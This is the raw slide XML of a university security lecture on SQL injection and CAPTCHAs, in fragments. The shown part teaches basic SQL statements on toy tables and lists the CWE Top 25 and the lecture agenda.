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3" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId52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5" r:id="rId45"/>
    <p:sldId id="306" r:id="rId46"/>
    <p:sldId id="307" r:id="rId47"/>
    <p:sldId id="309" r:id="rId48"/>
    <p:sldId id="310" r:id="rId49"/>
    <p:sldId id="311" r:id="rId50"/>
    <p:sldId id="312" r:id="rId5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C577D0C-167A-49ED-8727-562A38F614A0}">
  <a:tblStyle styleId="{CC577D0C-167A-49ED-8727-562A38F614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FD17B31-A734-46B0-8B05-200C5F75062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82"/>
    <p:restoredTop sz="90358"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="345" d="100"/>
          <a:sy n="345" d="100"/>
        </p:scale>
        <p:origin x="1896" y="176"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="162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we.mitre.org/top25/archive/2020/2020_cwe_top25.html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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CustomerID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 'Maria Anders' FROM Customers;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959d2ced3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1959d2ced3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959d2ced3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1959d2ced3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959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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959d2ced3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959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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959d2ced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959d2ced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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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959d2ced3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959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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959d2ced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1959d2ced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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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6cbd13de4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6cbd13de4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6cbd13de49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6cbd13de49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6cbd13de4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6cbd13de4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1959d2ced3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11959d2ced3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959d2ced3_0_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959d2ced3_0_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1959d2ced3_0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1959d2ced3_0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959d2ced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1959d2ced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https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html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1959d2ced3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1959d2ced3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1959d2ced3_0_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1959d2ced3_0_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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3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11959d2ced3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1959d2ced3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1959d2ced3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1959d2ced3_0_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1959d2ced3_0_4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1959d2ced3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11959d2ced3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1959d2ced3_0_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1959d2ced3_0_4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1959d2ced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1959d2ced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11959d2ced3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11959d2ced3_0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959d2ced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1959d2ced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1959d2ced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1959d2ced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959d2ced3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1959d2ced3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959d2ced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959d2ced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--SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CustomerID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CustomerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> FROM Customers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--SELECT * FROM Customers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--SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CustomerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 'Berlin' FROM Customers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--SELECT * FROM Customers WHERE Country = 'Germany'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--SELECT * FROM Customers WHERE Country = 'Germany' OR Country = 'Brazil'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INSERT INTO Customers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CustomerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ContactName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Address, City, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PostalCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Country) VALUES ('Jian', 'Chao', 'Woodward Hall', 'Boston', '28027', 'USA');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SElECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * FROM Customers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--UPDATE Customers SET City = 'Charlotte' WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CustomerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 'Jian'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--DELETE FROM Customers WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CustomerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 'Jian'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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SElECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * FROM Customers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--CREATE TABLE cats (id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>INT,name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> VARCHAR(255),likes VARCHAR(255),age INT)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--DROP TABLE cats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11700" y="1429000"/>
            <a:ext cx="8520600" cy="14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11700" y="29179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Optional">
  <p:cSld name="TITLE_AND_BODY_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F4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- Optional">
  <p:cSld name="TITLE_AND_TWO_COLUMNS_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F4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41310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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4588175" y="1246825"/>
            <a:ext cx="41310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- Optional">
  <p:cSld name="ONE_COLUMN_TEXT_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F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half body - Optional">
  <p:cSld name="ONE_COLUMN_TEXT_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F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16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Optional">
  <p:cSld name="CUSTOM_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F4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512100" y="4520775"/>
            <a:ext cx="811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41310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588175" y="1246825"/>
            <a:ext cx="41310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half body">
  <p:cSld name="TITLE_AND_BODY_2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16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USTOM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512100" y="4520775"/>
            <a:ext cx="811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- Optional">
  <p:cSld name="SECTION_HEADER_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="A4C2F4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7628700" y="1017725"/>
            <a:ext cx="1515300" cy="1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FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fall 2022</a:t>
            </a:r>
            <a:endParaRPr sz="600" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;9;p1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75EED6CE-A6E7-DC13-386B-545D98D97500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="879679"/>
            <a:ext cx="9144000" cy="276092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</a:rPr>
              <a:t>ITIS 6200 / 8200</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt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cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/190.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/732.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/119.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/78.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide4.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/287.html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cwe.mitre.org/data/definitions/125.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/20.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/476.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/416.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/94.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/787.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/200.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1429000"/>
            <a:ext cx="8520600" cy="14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SQL Injection and CAPTCHAs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SELECT</a:t>
            </a:r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body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="2511725"/>
            <a:ext cx="4411500" cy="5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SELECT name, age FROM bots</a:t>
            </a:r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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="208" name="Google Shape;208;p30"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="21460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209" name="Google Shape;209;p30"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="312500" y="3057625"/>
          <a:ext cx="1533900" cy="182865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944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2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0" name="Google Shape;210;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312500" y="1244825"/>
            <a:ext cx="3504900" cy="6156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Selected 2 columns from the table, keeping all rows.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SELECT</a:t>
            </a:r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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="217" name="Google Shape;217;p31"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="21460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218" name="Google Shape;218;p31"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="278300" y="2949125"/>
          <a:ext cx="3532900" cy="182865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9" name="Google Shape;219;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="2511725"/>
            <a:ext cx="4411500" cy="5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SELECT * FROM bots</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312500" y="1244825"/>
            <a:ext cx="3504900" cy="8313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asterisk (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"/>
              <a:t>) is shorthand for “all columns.” Select all columns from the table, keeping all rows.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SELECT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226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227" name="Google Shape;227;p32"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="21460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228" name="Google Shape;228;p32"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2293428975"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="278300" y="2949125"/>
          <a:ext cx="1607450" cy="128006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45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8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 err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0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/>
                        <a:t>1 rows, 2 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425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9" name="Google Shape;229;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="2511725"/>
            <a:ext cx="4411500" cy="5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SELECT id, 'pancakes' FROM bots</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312500" y="1244825"/>
            <a:ext cx="3504900" cy="4002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 constants instead of columns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WHERE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;p33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WHERE can be used to filter out certain rows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Arithmetic comparison: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/>
              <a:t>,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"/>
              <a:t>,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/>
              <a:t>,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&gt;=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>,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/>
              <a:t>,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&lt;&gt;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Arithmetic operators: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"/>
              <a:t>,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/>
              <a:t> ,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"/>
              <a:t> ,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/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Boolean operators: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/>
              <a:t>,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OR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AND has precedence over OR</a:t>
            </a:r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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="238" name="Google Shape;238;p33"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="21460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WHERE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="245" name="Google Shape;245;p34"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="21460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46" name="Google Shape;246;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="2206925"/>
            <a:ext cx="4411500" cy="7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SELECT * FROM bots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WHERE likes = 'pancakes'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7" name="Google Shape;247;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312500" y="1244825"/>
            <a:ext cx="3504900" cy="6156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Choose only the rows where the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likes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> column has value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pancakes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248" name="Google Shape;248;p34"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="312500" y="2987225"/>
          <a:ext cx="3532900" cy="109719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 row,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WHERE</a:t>
            </a:r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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="255" name="Google Shape;255;p35"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="21460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56" name="Google Shape;256;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="2206925"/>
            <a:ext cx="4411500" cy="7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SELECT name FROM bots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WHERE age &lt; 2 OR id = 1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7" name="Google Shape;257;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312500" y="1244825"/>
            <a:ext cx="3504900" cy="6156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all names of bots whose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en"/>
              <a:t> is less than 2 or whose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"/>
              <a:t> is 1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258" name="Google Shape;258;p35"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="298500" y="2987225"/>
          <a:ext cx="1433800" cy="146292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143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2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2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2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 rows, 1 column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59" name="Google Shape;259;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1798650" y="3318475"/>
            <a:ext cx="2250600" cy="3693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(selected because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 1)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0" name="Google Shape;260;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1798650" y="3718675"/>
            <a:ext cx="2250600" cy="3693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(selected because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 1.5)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INSERT INTO</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Google Shape;266;p36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 INTO is used to add rows into a table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VALUES is used for defining constant rows and columns, usually to be inserted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7" name="Google Shape;267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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="268" name="Google Shape;268;p36"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="21460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INSERT INTO</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="275" name="Google Shape;275;p37"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="1705375"/>
          <a:ext cx="3532900" cy="292584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willow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catnip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endParaRPr sz="1200" b="1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luna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naps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endParaRPr sz="1200" b="1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76" name="Google Shape;276;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1860333"/>
            <a:ext cx="4411500" cy="12941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INSERT INTO bots VALUES</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1" dirty="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(4, 'willow', 'catnip', 5),</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1" dirty="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(5, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>luna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', 'naps', 7)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77" name="Google Shape;277;p37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1347300" y="3622175"/>
            <a:ext cx="4140950" cy="615600"/>
            <a:chOff x="1347300" y="3622175"/>
            <a:chExt cx="4140950" cy="615600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="278" name="Google Shape;278;p37"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503350" y="3759000"/>
              <a:ext cx="984900" cy="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9" name="Google Shape;279;p37"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503350" y="4068700"/>
              <a:ext cx="984900" cy="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80" name="Google Shape;280;p37"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347300" y="3622175"/>
              <a:ext cx="32247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This statement results in two extra rows being added to the table</a:t>
              </a:r>
              <a:endParaRPr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UPDATE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;p3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is used to change the values of existing rows in a table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Followed by SET after the table name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Usually combined with WHERE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Syntax:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/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UPDATE [table]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SET [column] = [value]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WHERE [condition]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7" name="Google Shape;287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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="288" name="Google Shape;288;p38"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="1705375"/>
          <a:ext cx="3532900" cy="292584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willow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catnip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endParaRPr sz="1200" b="1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luna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naps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endParaRPr sz="1200" b="1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3" name="Google Shape;293;p39"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="1705375"/>
          <a:ext cx="3532900" cy="292584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willow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catnip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</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="1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luna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naps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endParaRPr sz="1200" b="1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94" name="Google Shape;294;p3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UPDATE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295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96" name="Google Shape;296;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1860333"/>
            <a:ext cx="4411500" cy="10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UPDATE bots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SET age = 6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WHERE name = 'willow'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97" name="Google Shape;297;p39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1347300" y="3136575"/>
            <a:ext cx="7339225" cy="1707075"/>
            <a:chOff x="1347300" y="3136575"/>
            <a:chExt cx="7339225" cy="1707075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="298" name="Google Shape;298;p39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2913750" y="3899750"/>
              <a:ext cx="5772775" cy="943900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="230911" h="37756" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="4651"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="37756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230911" y="37756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230911" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="E69138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9" name="Google Shape;299;p39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347300" y="3136575"/>
              <a:ext cx="3224700" cy="10467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This statement results in this cell in the table being changed. If the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>WHERE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> clause was missing, every value in the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>age</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> column would be set to 6.</a:t>
              </a:r>
              <a:endParaRPr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Today: SQL Injection and CAPTCHAS</a:t>
            </a:r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Structure of modern web services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 injection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Defenses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Command injection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Defenses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CAPTCHAs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Subverting CAPTCHAs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DELETE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p40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DELETE FROM is used to delete rows from a table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Usually combined with WHERE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Syntax:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/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DELETE FROM [table]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WHERE [condition]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Google Shape;306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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="307" name="Google Shape;307;p40"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="1705375"/>
          <a:ext cx="3532900" cy="292584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willow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catnip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</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="1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luna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naps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endParaRPr sz="1200" b="1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2" name="Google Shape;312;p41"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="1705375"/>
          <a:ext cx="3532900" cy="292584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4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willow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catnip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6</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="1" strike="sngStrike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5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luna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naps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7</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="1" strike="sngStrike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13" name="Google Shape;313;p4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DELETE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314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15" name="Google Shape;315;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1860333"/>
            <a:ext cx="4411500" cy="7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DELETE FROM bots</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1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WHERE age &gt;= 6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316" name="Google Shape;316;p41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
